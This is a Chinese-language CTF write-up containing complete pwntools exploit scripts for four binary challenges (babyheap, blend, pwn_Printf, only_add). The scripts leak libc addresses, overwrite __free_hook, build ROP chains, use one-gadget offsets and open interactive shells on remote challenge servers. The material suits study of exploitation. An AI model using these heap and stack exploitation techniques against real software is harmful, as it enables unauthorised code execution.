难受,缺氧了,连着三天打完后,身体受不了。
附件
babyheap
挺简单的堆
1 | from pwn import* |
def menu(ch):
    """Select menu entry *ch*: wait for the `>>` prompt, then send it as one line."""
    choice = str(ch)
    p.sendlineafter('>>', choice)
def new():
    """Menu entry 1; the program asks for nothing further here."""
    choice = 1
    menu(choice)
def show(index):
    """Menu entry 2, then answer the `?` prompt with *index*."""
    menu(2)
    idx = str(index)
    p.sendlineafter('?', idx)
def edit(index, size, content):
    """Menu entry 3: answer `?` with *index* and `:` with *size*, then send
    *content* raw (no trailing newline) after the next `:` prompt."""
    menu(3)
    for prompt, value in (('?', index), (':', size)):
        p.sendlineafter(prompt, str(value))
    p.sendafter(':', content)
def free(index):
    """Menu entry 4, then answer the `?` prompt with *index*."""
    menu(4)
    idx = str(index)
    p.sendlineafter('?', idx)
p = process('./main')
# NOTE(review): `p` is rebound to the remote tube on the very next line, so the
# local child started above is never closed and keeps running until the script
# exits. Keep only the target actually in use (or switch on a flag).
p = remote('47.111.104.169',57303)
libc =ELF('./libc-2.27.so')
# Setup: ten new() calls, then free() in the author's chosen order
# (9 down to 3, then 0, 1, 2).
for i in range(10):
    new()
for i in range(9,2,-1):
    free(i)

free(0)
free(1)
free(2)

for i in range(7):
    new()
new()
new()
new()

free(8)

for i in range(6):
    free(i)
free(7)
for i in range(6):
    new()
new() # 7 TARGET
edit(7,0xF8,'FMYY')

for i in range(7):
    free(i)
free(9)

for i in range(7):
    new()
new()
show(7)

# Leak: read until the first 0x7F byte, take the trailing 6 bytes as a pointer,
# and subtract the author's offset (expressed relative to __malloc_hook) to get
# the libc load address.
# NOTE(review): '\x7F' / ljust(8,'\x00') on tube output is Python-2 pwntools;
# under Python 3 the tube yields bytes and these literals would need b'...'.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x10 - 0x60
log.info('LIBC:\t' + hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
system = libc_base + libc.sym['system']
new() #9

for i in range(5):
    free(i)
free(7)
free(9)

# Final stage: the three edit() calls write the two computed addresses and the
# '/bin/sh' string (sent raw by sendafter, so no newline is appended).
new()
edit(0,0xF0,p64(free_hook))
new()
edit(1,0xF0,'/bin/sh')
new()
edit(2,0xF0,p64(system))
free(1)
p.interactive()
blend
异常的时候有个栈溢出,然后会跳回到main函数的结束位置,迁移到堆上执行ROP
1 | from pwn import* |
def menu(ch):
    """Select menu entry *ch* once the `choice >` prompt has been seen."""
    choice = str(ch)
    p.sendlineafter('choice >', choice)
def show_name(index):
    """Menu entry 1.

    *index* is accepted for call-site symmetry with the other helpers but is
    not sent anywhere; the program asks for nothing after this choice.
    """
    choice = 1
    menu(choice)
def new(content):
    """Menu entry 2, then send *content* raw after the `input note:` prompt
    (the caller supplies any trailing newline itself)."""
    menu(2)
    prompt = 'input note:'
    p.sendafter(prompt, content)
def free(index):
    """Menu entry 3, then answer the `index>` prompt with *index*."""
    menu(3)
    idx = str(index)
    p.sendlineafter('index>', idx)
def show():
    """Menu entry 4; no further input is sent."""
    choice = 4
    menu(choice)
def gift(content):
    """Hidden menu entry 666, then send *content* as a line after the `:` prompt."""
    menu(666)
    prompt = ':'
    p.sendlineafter(prompt, content)
17 | |
p = process('./main')
# NOTE(review): `p` is rebound to the remote tube on the next line; the local
# child started above is never closed. Keep only the target actually in use.
p = remote('47.111.104.99',51504)
libc =ELF('./libc-2.23.so')
# The first ':' prompt is answered with the format string '%11$p'; after menu
# entry 1, 14 characters following 'Current user:' are parsed as hex and the
# author's offset from __libc_start_main is subtracted to get the libc base.
p.sendlineafter(':','%11$p')
menu(1)
p.recvuntil('Current user:')
libc_base = int(p.recv(14),16) - libc.sym['__libc_start_main'] - 240
log.info('LIBC:\t' + hex(libc_base))
new('FMYY\n')
# 0x4527A is a libc offset chosen by the author; it is hard-coded for this
# exact libc-2.23 build.
new('FMYY'*2*4 + p64(libc_base + 0x4527A) + '\n')
free(1)
free(0)
show()
# Heap leak: 6 bytes after 'index 1:' are read as a pointer and the constant
# 0x1C80 is subtracted to recover the heap base.
p.recvuntil('index 1:')
heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x1C80
log.info('HEAP:\t' + hex(heap_base))
# Only the low 7 bytes of the packed pointer are sent ([0:7]); sendlineafter
# appends the newline, so the last byte of the 8-byte value is not written here.
gift('FMYY'*2*4 + p64(heap_base + 0x1C80 + 0x28)[0:7])
p.interactive()
pwn_Printf
非预期,按照Google CTF 的sprint逆向改的一个Pwn题,如果要逆出来,确实有点难度,但是可以直接跳过,最后就一个简单栈溢出
1 | from pwn import* |
p = process('./main')
# NOTE(review): `p` is rebound to the remote tube on the next line, leaving the
# local child above running and unclosed. Keep only the target in use.
p = remote('47.111.96.55',55106)
elf =ELF('./main')
libc =ELF('./libc-2.23.so')
# 16 lines of '32' are sent before the payload; per the prose above this is how
# the author skips the challenge's parsing stage.
for i in range(16):
    p.sendline('32')
# Both 0x401213 and 0x4007D4 below are addresses hard-coded for this exact build
# of ./main; the rest of the chain comes from the binary's GOT/PLT via pwntools.
pop_rdi_ret = 0x0000000000401213
payload = p64(elf.got['read']) + p64(pop_rdi_ret) + p64(elf.got['read']) + p64(elf.plt['puts']) + p64(0x4007D4) + p64(elf.plt['puts'])
p.sendline(payload)
# Leak: first 0x7F byte, trailing 6 bytes as a pointer, offset against read().
# NOTE(review): the '\x7F' / ljust(8,'\x00') handling is Python-2 pwntools;
# under Python 3 the tube yields bytes and these literals would need b'...'.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['read']
log.info('LIBC:\t' + hex(libc_base))

# 0xF1207 is a libc offset chosen by the author for this libc-2.23 build.
payload = '\x00'*8 + p64(libc_base + 0xF1207)
p.sendline(payload)
p.interactive()
only_add
堆风水,直到比赛结束都没有布置出一个合理的堆结构,赛后花了两个小时成功构造出来,懒得再一步布置了,概率1/256爆破吧
1 | from pwn import* |
def menu(ch):
    """Select menu entry *ch* once the `choice:` prompt has been seen."""
    choice = str(ch)
    p.sendlineafter('choice:', choice)
def realloc(size, content):
    """Menu entry 1: answer `Size:` with *size*, then send *content* raw after `Data:`."""
    menu(1)
    sz = str(size)
    p.sendlineafter('Size:', sz)
    p.sendafter('Data:', content)
def free():
    """Menu entry 1 with a size of 0 (the program's release path)."""
    menu(1)
    p.sendlineafter('Size:', '0')
def R(size, content):
    """Prompt-free variant of realloc(): write '1', *size* and *content* with a
    0.1 s pause after each write instead of synchronising on prompts."""
    for line in ('1', str(size)):
        p.sendline(line)
        sleep(0.1)
    p.send(content)
    sleep(0.1)
def F():
    """Prompt-free variant of free(): write '1' then '0', pausing 0.1 s after each."""
    for line in ('1', '0'):
        p.sendline(line)
        sleep(0.1)
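libc =ELF('./libc-2.27.so')
# Retry loop: every iteration starts a fresh local ./main and replays the whole
# sequence; the prose above puts the per-attempt success chance at about 1/256.
while True:
    p = process('./main')
    try:
        realloc(0x18,'FMYY')
        free()
        realloc(0x4F0,'FMYY')
        realloc(0x4F0 - 0x80,'FMYY')
        free()
        realloc(0xF0,'FMYY')
        free()
        realloc(0x100,'FMYY')
        realloc(0x28,'FMYY')
        free()
        realloc(0x48,'FMYY')
        free()
        realloc(0x110,'FMYY')
        realloc(0x38,'FMYY')
        free()
        #######
        realloc(0x58,'FMYY')
        free()
        realloc(0x68,'FMYY')
        free()
        realloc(0x58,'\x00'*0x58 + '\xF1')
        free()
        realloc(0x68,'FMYY')
        free()
        realloc(0x500,'FMYY')
        free()
        # The two-byte tails ('\x60\x67' here, '\xD0\x96' below) are partial
        # writes whose high bits the author guesses; this is what the loop retries.
        realloc(0xE0,'\x00'*0x68 + p64(0x31) + '\x60\x67')
        free()
        #####
        realloc(0x48,'\x00'*0x48 + '\xC1')
        free()
        realloc(0x38,'FMYY')
        free()
        realloc(0xB0,'\x00'*0x38 + p64(0xE1) + '\xD0\x96')
        free()
        realloc(0xD0,'FMYY')
        realloc(0x70,'FMYY')
        free()
        realloc(0xD0,'FMYY')
        realloc(0x70,'FMYY')
        free()

        realloc(0xD0,p64(0xFBAD1800) + '\x00'*0x18 + '\xC8')
        # Leak: first 0x7F byte, trailing 6 bytes as a pointer, offset against
        # _IO_2_1_stdin_. Python-2 pwntools string handling, as in the other scripts.
        libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['_IO_2_1_stdin_']
        log.info('LIBC:\t' + hex(libc_base))
        # Sanity check on the leaked value: a guess that went wrong yields a
        # value below this threshold, so the attempt is discarded and retried.
        if libc_base < 0x7F0000000000:
            p.close()
            continue
        # Second phase uses menu entry 2 and the prompt-free R()/F() helpers.
        menu(2)
        R(0x80,'FMYY')
        F()
        R(0x90,'FMYY')
        F()
        R(0xA0,'FMYY')
        F()
        R(0x88,'\x00'*0x88 + '\xD1')
        F()
        R(0x90,'FMYY')
        F()
        R(0xC0,'\x00'*0x98 + p64(0xB1) + p64(libc_base + libc.sym['__free_hook']))
        F()
        R(0xA0,'FMYY')
        R(0x60,'FMYY')
        F()
        # 0x10A45C is a libc offset chosen by the author for this libc-2.27 build.
        R(0xA0,p64(libc_base + 0x10A45C))
        F()
        break
    except Exception:
        # Was a bare `except:`, which also swallowed KeyboardInterrupt and
        # SystemExit and made the retry loop impossible to stop with Ctrl-C.
        # EOFError (a crashed child) is still an Exception subclass, so the
        # retry-on-failure behaviour is unchanged.
        p.close()
        continue
p.interactive()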